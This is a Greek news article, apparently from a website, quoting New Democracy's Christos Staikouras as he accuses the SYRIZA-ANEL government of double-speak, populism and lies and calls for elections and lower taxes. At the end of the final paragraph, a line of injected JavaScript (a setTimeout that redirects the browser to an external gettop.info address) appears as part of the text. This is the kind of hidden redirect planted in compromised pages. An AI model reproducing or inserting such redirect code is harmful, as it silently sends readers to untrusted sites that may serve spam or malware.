ΝΔ: H διγλωσσία της κυβέρνησης ΣΥΡΙΖΑ-ΑΝΕΛ παροιμιώδης

0
6

 

Σε δήλωσή του, ο τομεάρχης Οικονομικών της ΝΔ, Χρήστος Σταϊκούρας επιτίθεται στην κυβέρνηση αναφέροντας χαρακτηριστικά: «Η ανευθυνότητα και ο τυχοδιωκτισμός της κυβέρνησης ΣΥΡΙΖΑ και ΑΝΕΛ έχουν ξεπεράσει κάθε όριο. Η διγλωσσία της παροιμιώδης».

Ο βουλευτής κατηγορεί την κυβέρνηση ότι εντός Ελλάδας δίνει ψεύτικες υποσχέσεις και παράλληλα κάνει λόγο για άνευ όρων υποταγή και εξευτελισμό της χώρας στο εξωτερικό.

«Οι Έλληνες πληρώνουμε, καθημερινά, πολύ ακριβά την υποκρισία και τον λαϊκισμό των ΣΥΡΙΖΑ και ΑΝΕΛ. Δεν μπορούν, πλέον, να ξεγελάσουν κανέναν. Είναι αιχμάλωτοι στα ψέματα και τις ιδεοληψίες τους. Δεν θα αφήσουμε η αποτυχία τους να γίνει αποτυχία της Ελλάδας», σημειώνει επαναλαμβάνοντας το αίτημα της ΝΔ για εκλογές.

«Απαιτείται άμεσα πολιτική αλλαγή. Με εφαρμογή ενός διαφορετικού μείγματος οικονομικής πολιτικής. Με λιγότερους φόρους, λιγότερες δαπάνες και αποτελεσματικότερο κράτος. Με ενίσχυση της ανταγωνιστικότητας και της εξωστρέφειας. Με περισσότερες επενδύσεις και περισσότερες δουλειές. Για να «ανασάνει» η κοινωνία. Για να πάρει ξανά μπρος η οικονομία. Για να γίνει η Ελλάδα μία χώρα που αξίζει να υπηρετούμε και να ζούμε», υπογραμμίζει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here